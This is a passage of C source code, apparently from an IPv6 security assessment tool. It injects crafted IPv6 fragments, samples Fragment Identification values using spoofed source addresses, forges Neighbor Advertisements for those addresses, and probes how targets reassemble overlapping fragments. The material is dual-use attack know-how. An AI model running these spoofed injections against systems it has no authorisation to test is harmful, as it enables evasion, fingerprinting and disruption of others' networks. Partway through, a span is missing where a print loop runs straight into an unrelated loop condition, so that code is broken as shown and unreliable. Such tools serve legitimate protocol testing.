ntest1=0; ntest2=0; icmp6_sig= random(); testtype= FIXED_ORIGIN; if(idata.srcprefix_f){ randprefix=idata.srcaddr; randpreflen=idata.srcpreflen; } else{ randprefix= idata.srcaddr; randpreflen=64; sanitize_ipv6_prefix(&randprefix, randpreflen); } while(1){ curtime=time(NULL); if( testtype==FIXED_ORIGIN && ((curtime - start) >= FID_ASSESS_TIMEOUT || ntest1 >= NSAMPLES)){ testtype= MULTI_ORIGIN; addr_sig= random(); addr_key= random(); start= curtime; continue; } else if( testtype==MULTI_ORIGIN && ((curtime - start) >= FID_ASSESS_TIMEOUT || ntest2 >= NSAMPLES)){ break; } if((curtime - lastfrag1) >= 1){ if(testtype == FIXED_ORIGIN){ for(i=0; i< (NSAMPLES/NBATCHES); i++){ if(send_fid_probe(&idata) == -1){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } } else{ for(i=0; i< (NSAMPLES/NBATCHES); i++){ randomize_ipv6_addr(&(idata.srcaddr), &randprefix, randpreflen); /* * Two words of the Source IPv6 Address are specially encoded such that we only respond * to Neighbor Solicitations that target those addresses, and accept ICMPv6 Echo Replies * only if they are destined to those addresses */ idata.srcaddr.s6_addr16[5]= addr_sig; idata.srcaddr.s6_addr16[7] = idata.srcaddr.s6_addr16[6] ^ addr_key; /* * XXX This trick is innefective with OpenBSD. Hence we don't try to prevent the * first-fragment of the response packet from being dropped. if(send_neighbor_solicit(&idata) == -1){ puts("Error while sending Neighbor Solicitation"); exit(EXIT_FAILURE); } */ if(send_fid_probe(&idata) == -1){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } } lastfrag1=curtime; continue; } rset= sset; timeout.tv_usec=0; timeout.tv_sec= 1; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } if(sel == 0) continue; /* Read a packet (Echo Reply, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && \ pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6 && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(testtype==FIXED_ORIGIN){ if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && \ !localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(pkt_ns->nd_ns_target.s6_addr16[5] != addr_sig || \ pkt_ns->nd_ns_target.s6_addr16[7] != (pkt_ns->nd_ns_target.s6_addr16[6] ^ addr_key)) continue; if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(pkt_ipv6->ip6_nxt == IPPROTO_FRAGMENT){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct ip6_frag) + sizeof(struct icmp6_hdr) + sizeof(u_int32_t))) continue; pkt_fh= (struct ip6_frag *) ( (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); if(pkt_fh->ip6f_nxt != IPPROTO_ICMPV6) continue; /* XXX We only sample non-first fragments (see below) */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)) continue; /* * XXX These checks were removed, since when assessing some implementations on a local * network, we never get the first fragment because it is discarded when it triggers ND. */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *)pkt_fh + sizeof(struct ip6_frag)); if(pkt_icmp6->icmp6_type != ICMP6_ECHO_REPLY) continue; if(ntohs(pkt_icmp6->icmp6_data16[0]) != getpid() ) continue; } if(testtype==FIXED_ORIGIN){ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } /* XXX Not used when sampling non-first fragments */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ if( *(u_int32_t *)((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)) != icmp6_sig){ continue; } } if(ntest1 >= NSAMPLES) continue; test1[ntest1]= ntohl(pkt_fh->ip6f_ident); ntest1++; } else{ if(pkt_ipv6->ip6_dst.s6_addr16[5] != addr_sig || \ pkt_ipv6->ip6_dst.s6_addr16[7] != (pkt_ipv6->ip6_dst.s6_addr16[6] ^ addr_key)){ continue; } /* XXX Not used when sampling non-first fragments */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ if( *(u_int32_t *)((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)) != icmp6_sig){ continue; } } if(ntest2 >= NSAMPLES) continue; test2[ntest2]= ntohl(pkt_fh->ip6f_ident); ntest2++; } } } if(idata.verbose_f > 1){ printf("Sampled %u Fragment Identifications from single-origin probes\n", ntest1); for(i=0; i= QUERY_TIMEOUT || (!resp_f && lastfrag != 0))){ break; } if((curtime - lastfrag) >= nsleep){ puts("Sending Fragment(s)...."); frags=0; if(!foffset_f){ foffset= random(); } if(forder != LAST_FRAGMENT){ foffset= (foffset >> 3) << 3; } while(frags < nfrags){ if(send_fragment(&idata, fid_f?fid:random(), foffset, fsize_f?fsize:( ((MIN_FRAG_SIZE+(random()%400))>>3)<<3), \ forder, tstamp_f) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } frags++; } lastfrag=curtime; continue; } rset= sset; timeout.tv_usec=0; timeout.tv_sec= (lastfrag+nsleep)-curtime; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } if(sel == 0) continue; /* Read a packet (Echo Reply, ICMPv6 Error, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && !localaddr_f && \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_TIME_EXCEEDED)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; /* Do a preliminar validation check on the ICMPv6 packet (packet size, Source Address, and Destination Address). */ if(!valid_icmp6_response(&idata, pkthdr, pktdata)){ continue; } switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: if(resp_f) print_icmp6_echo(&idata, pkthdr, pktdata); break; case ICMP6_TIME_EXCEEDED: if(resp_f) print_icmp6_timed(&idata, pkthdr, pktdata); break; } } } } exit(EXIT_SUCCESS); } exit(EXIT_SUCCESS); } /* * Function: print_icmp6_info() * * Print information about a received ICMPv6 Echo Response packet */ void print_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; time_t rtt; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } rtt= time(NULL) - *(time_t *) ( (unsigned char *) pkt_ipv6 + (sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr))); printf("ICMPv6 echo Reply from %s", pv6addr); if(rtt > 0) printf(" (RTT: %u second%s)\n", (u_int32_t)rtt, (rtt>1)?"s":""); else puts(" (RTT: < 1 second)"); } /* * Function: print_icmp6_timed() * * Print information about a received ICMPv6 Time Exceeded error message */ void print_icmp6_timed(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_ext *pkt_ext; struct ip6_frag *pkt_fh_fh; u_int8_t pkt_prev_nh; time_t rtt; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end) return; } else{ return; } if(pkt_fh_fh == NULL) return; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return; } } else{ return; } if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6_icmp6+ sizeof(struct icmp6_hdr)); /* Verify our "checksum" */ if(*(u_int32_t *)(pkt_ptr+sizeof(time_t)) != ((*(u_int32_t *)pkt_ptr) ^ 0xabcdabcd)){ return; } rtt= time(NULL) - *(time_t *) pkt_ptr; printf("Response from %s: ICMPv6 Time Exceeded error message (Reassembly timeout: %lu seconds)\n", pv6addr, \ (LUI) rtt); } else printf("Response from %s: ICMPv6 Time Exceeded error message\n", pv6addr); } /* * Function: process_icmp6_echoinfo() * * Process ICMPv6 echo reply messages received in response to our probe packets that investigate * the fragment reassembly policy of a target */ void process_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned char *test, unsigned int *responses){ struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block1)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize*2-overlap)){ return; } if(test_frag_pattern( (unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr) + minfragsize-overlap), \ overlap, block1)){ test[0]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), \ overlap, block6)){ test[0]= LAST_COPY; } else{ test[0]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block2)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 3-overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), overlap, block2)){ test[1]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), \ overlap, block7)){ test[1]= LAST_COPY; } else{ test[1]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block3)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 3-overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2-overlap),\ overlap, block6)){ test[2]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2-overlap), \ overlap, block7)){ test[2]= LAST_COPY; } else{ test[2]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block4)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 4)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block6)){ test[3]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block7)){ test[3]= LAST_COPY; } else{ test[3]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block5)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 4 - overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block6)){ test[4]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block7)){ test[4]= LAST_COPY; } else{ test[4]= UNKNOWN_COPY; } (*responses)++; } else{ if(idata->verbose_f) puts("ICMPv6 Echo Reply for unknown probe type"); } } /* * Function: process_icmp6_timed() * * Process ICMPv6 Time Exceeded messages received in response to our probe packets that investigate * the fragment reassembly policy of a target */ void process_icmp6_timed(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned char *test){ struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_ext *pkt_ext; struct ip6_frag *pkt_fh_fh; u_int8_t pkt_prev_nh; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end) return; } else{ return; } if(pkt_fh_fh == NULL) return; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return; } } else{ return; } if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block1)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } else{ test[0]= TIME_EXCEEDED; } } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block2)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[1]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block3)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[2]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block4)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[3]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block5)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[4]= TIME_EXCEEDED; } else{ test[4]= UNKNOWN_COPY; } } /* * Function: send_fragment2() * * Sends an IPv6 for evaluating the fragment reassembly policy */ int send_fragment2(struct iface_data *idata, u_int16_t ip6len, unsigned int id, unsigned int offset, unsigned int fsize, unsigned int order, \ char *block){ unsigned char *ptrend; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; fsize= (fsize>>3) << 3; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (ptr+sizeof(struct ip6_frag)+fsize) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); return(-1); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ fh= (struct ip6_frag *) ptr; bzero(ptr, FRAG_HDR_SIZE); fh->ip6f_ident= htonl(id); if(order == LAST_FRAGMENT || order==ATOMIC_FRAGMENT){ m=0; } else{ m=IP6F_MORE_FRAG; } if(order==FIRST_FRAGMENT || order==ATOMIC_FRAGMENT) offset=0; fh->ip6f_offlg = (htons(offset) & IP6F_OFF_MASK) | m; *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) fh; ptr+= sizeof(struct ip6_frag); *prev_nh = IPPROTO_ICMPV6; if(order == FIRST_FRAGMENT || order==ATOMIC_FRAGMENT){ if((ptr+ sizeof(struct icmp6_hdr)) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting ICMPv6 header"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); for(i=0; i< (fsize/8); i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } ptrend=ptr; for(i=0; i< (ip6len-sizeof(struct icmp6_hdr)-fsize)/8; i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } /* Length of the reassembled fragment */ ipv6->ip6_plen= htons(ip6len); icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); ptr= ptrend; /* Length of the current fragment */ ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } else{ if((ptr+ fsize) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } for(i=0; i< (fsize/8); i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr- buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return 0; } /* * Function: send_fragment() * * Sends an IPv6 fragment */ int send_fragment(struct iface_data *idata, unsigned int id, unsigned int offset, unsigned int fsize, \ unsigned int forder, unsigned int tstamp_f){ time_t tstamp; unsigned int i; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); return(-1); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); return(-1); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (ptr+sizeof(struct ip6_frag)+fsize) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); return(-1); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ fh= (struct ip6_frag *) ptr; bzero(ptr, FRAG_HDR_SIZE); fh->ip6f_ident= htonl(id); if(forder == LAST_FRAGMENT || forder == ATOMIC_FRAGMENT) m=0; else m=IP6F_MORE_FRAG; if((forder==FIRST_FRAGMENT || forder==ATOMIC_FRAGMENT) && !foffset_f) offset=0; fh->ip6f_offlg = (htons(offset) & IP6F_OFF_MASK) | m; *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) fh; ptr+= sizeof(struct ip6_frag); if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); return(-1); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if(forder == FIRST_FRAGMENT || forder == ATOMIC_FRAGMENT){ if((ptr+ fsize) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting ICMPv6 header"); return(-1); } if(!fsize_f && (forder != LAST_FRAGMENT && forder != ATOMIC_FRAGMENT)){ fsize= (fsize>>3) << 3; } if(fsize < sizeof(struct icmp6_hdr)){ if(idata->verbose_f) puts("Fragment size too large to hold an ICMPv6 header"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); fsize-= sizeof(struct icmp6_hdr); if(tstamp_f && fsize >= (sizeof(time_t)+sizeof(u_int32_t))){ if((ptr+ (sizeof(time_t) + sizeof(u_int32_t))) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } /* We include a timstamp to be able to measure the Fragment Reassembly timeout */ tstamp= time(NULL); *(time_t *)ptr= tstamp; ptr+= sizeof(time_t); /* We include a "checksum" such that we can tell the responses we elicit from other packets */ *(u_int32_t *)ptr= (u_int32_t)tstamp ^ 0xabcdabcd; ptr+= sizeof(u_int32_t); if(fsize > (sizeof(time_t)+sizeof(u_int32_t))) fsize-= (sizeof(time_t)+sizeof(u_int32_t)); else fsize=0; } for(i=0; i< (fsize/4); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); icmp6->icmp6_cksum = in_chksum(v6buffer, 